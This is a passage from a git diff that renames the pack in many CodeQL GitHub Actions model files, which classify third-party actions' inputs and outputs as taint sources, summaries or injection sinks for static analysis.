+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
diff --git a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
index d7839211e20d..ba5de3c24706 100644
--- a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
+++ b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
index 3ff92757361b..27a8ffae1857 100644
--- a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
+++ b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
index 2e41b4f8eb5b..b87f18629996 100644
--- a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
+++ b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
index 62ff29bc9f0c..7ead429278e5 100644
--- a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"]
diff --git a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
index af4e15da03b0..6b900caef361 100644
--- a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
index 2dbf47187144..cafdfada61ba 100644
--- a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
+++ b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
index 412db371965c..646d54ac92ab 100644
--- a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
+++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
index 4bc7e2518080..f316799fa4a7 100644
--- a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
+++ b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml
index 845ae1770ed4..116c231c30a4 100644
--- a/ql/lib/ext/manual/docker_build-push-action.model.yml
+++ b/ql/lib/ext/manual/docker_build-push-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
index 226a151dabab..a60f1cc9fb1a 100644
--- a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
+++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"]
diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
index 8cdcabb2c117..eafb7d1fc3aa 100644
--- a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
+++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml
index 780acdb98fff..b4aab55179b3 100644
--- a/ql/lib/ext/manual/endbug_latest-tag.model.yml
+++ b/ql/lib/ext/manual/endbug_latest-tag.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml
index 038f1639d3cf..3b7b4aea7133 100644
--- a/ql/lib/ext/manual/expo_expo-github-action.model.yml
+++ b/ql/lib/ext/manual/expo_expo-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
index d948bda8bf43..b09bec4a1d42 100644
--- a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
+++ b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml
index ed9eeb6b2520..cb71f958365e 100644
--- a/ql/lib/ext/manual/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/manual/frabert_replace-string-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
diff --git a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
index f6441133c7af..c4f8a3efe3ea 100644
--- a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"]
diff --git a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
index 357ffc1c94a8..aa9dd5096610 100644
--- a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
+++ b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml
index 0288103fd0ad..767c77310e8d 100644
--- a/ql/lib/ext/manual/game-ci_unity-builder.model.yml
+++ b/ql/lib/ext/manual/game-ci_unity-builder.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
index 05dca2f8262a..6df70ae927a6 100644
--- a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
+++ b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
index 123dabe450e9..3f43f195f68f 100644
--- a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
+++ b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml
index cb127c7ff467..3c63d7b845f1 100644
--- a/ql/lib/ext/manual/getsentry_action-release.model.yml
+++ b/ql/lib/ext/manual/getsentry_action-release.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/manual/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml
index 79936a515206..6db033ebd9fd 100644
--- a/ql/lib/ext/manual/github_codeql-action.model.yml
+++ b/ql/lib/ext/manual/github_codeql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/ql/lib/ext/manual/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml
index 9bc26169b27b..a376aefd6f60 100644
--- a/ql/lib/ext/manual/go-semantic-release_action.model.yml
+++ b/ql/lib/ext/manual/go-semantic-release_action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
index 8aa19f944523..51ca0af21c3d 100644
--- a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
index dc86b19a69b1..28d118e6b611 100644
--- a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
index bc9f2aad14c1..7e045f8380a4 100644
--- a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
index f288c615a351..2a6d3fac1df7 100644
--- a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
+++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
index c3604795c256..a3c590ec473e 100644
--- a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
index dfcc204c2bac..98a61516c600 100644
--- a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
diff --git a/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml
index c8d5e822c02c..17aaecf80c56 100644
--- a/ql/lib/ext/manual/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/manual/haya14busa_action-cond.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml
index 5c7ec5f957fe..60a68ed2f8d2 100644
--- a/ql/lib/ext/manual/hexlet_project-action.model.yml
+++ b/ql/lib/ext/manual/hexlet_project-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
index 5384571801c6..3c0820b6878c 100644
--- a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
index ba5de742701c..99146ff21be0 100644
--- a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
index ce0fb5734932..7790454a9349 100644
--- a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml
index 8f53dfeb118a..e3cea2e555a4 100644
--- a/ql/lib/ext/manual/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/manual/iterative_setup-cml.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml
index 6d7d368c7810..c3346d689456 100644
--- a/ql/lib/ext/manual/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/manual/iterative_setup-dvc.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
index 9b0f078d8742..2e2c0cff0ef8 100644
--- a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
index dabec4e8d215..97b631cdfcd6 100644
--- a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
diff --git a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
index 2db040a0709a..c6d3c5cfb48e 100644
--- a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml
index e8d4aa790a66..697189cfbd01 100644
--- a/ql/lib/ext/manual/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/manual/jsdaniell_create-json.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
index 3a5cf8c8be2d..7f82a8b74f5d 100644
--- a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
+++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/jsmith/changes-since-last-tag
diff --git a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
index 8fde3e0c110f..95bd63fb22e1 100644
--- a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
index e9b04f2806f6..1fc8b037530a 100644
--- a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
index 3e646e4482f2..40b8b093957d 100644
--- a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
+++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
index 0d4df5ef6b1d..0c3cf006d3eb 100644
--- a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
+++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/karpikpl/list-changed-files-action
diff --git a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
index 386baaf2f95a..e61008f160ed 100644
--- a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml
index 5e7374dabad4..96e4e8f02f5c 100644
--- a/ql/lib/ext/manual/knu_changed-files.model.yml
+++ b/ql/lib/ext/manual/knu_changed-files.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/knu/changed-files
diff --git a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
index d9c7d33c86f4..feff62d16c07 100644
--- a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
index 016a8ebc8cfa..b74e721e577f 100644
--- a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
index d358aa238931..d59a122a53ff 100644
--- a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
index a437dc2c4f29..8e108765b407 100644
--- a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
+++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"]
diff --git a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
index f37bcbd62973..6f66e6cf867e 100644
--- a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
index c7474549fcb5..acdc250e3535 100644
--- a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
+++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
index 05acda9aac9d..69298631c6e2 100644
--- a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
